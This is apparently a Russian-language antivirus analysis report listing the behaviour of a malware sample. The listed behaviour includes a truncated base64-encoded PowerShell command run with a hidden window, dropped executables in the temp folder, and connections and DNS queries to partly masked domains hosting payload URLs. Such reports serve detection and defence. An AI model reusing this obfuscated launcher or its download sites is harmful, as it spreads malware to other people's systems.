Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABHADAAMwAzAHAAMgAxAD0AJwBXADEAdgBoAHUANABtACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMARQBgAGMAYABVAFIAaQBUAFkAUABSAE8AdABPAGAAYwBgAG8ATAAiACAAPQAgAC...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1516
- %TEMP%\1378159.cvr
- %TEMP%\wmqe.exe
- %TEMP%\wmqe.exe
- 'en####oftware.com':80
- 'en####oftware.com':443
- 'am####systems.com':80
- 'du#####mechanical.com':80
- 'pi###actinc.com':80
- http://en####oftware.com/blogs/mtvqyqwl85094171/
- http://am####systems.com/wp/ZxXBfZxSe/
- http://du#####mechanical.com/images/zlFAsqZh/
- 'en####oftware.com':443
- DNS ASK en####oftware.com
- DNS ASK am####systems.com
- DNS ASK du#####mechanical.com
- DNS ASK pi###actinc.com
- DNS ASK tf.###pyy120.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABHADAAMwAzAHAAMgAxAD0AJwBXADEAdgBoAHUANABtACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMARQBgAGMAYABVAFIAaQBUAFkAUABSAE8AdABPAGAAYwBgAG8ATAAiACAAPQAgAC...' (со скрытым окном)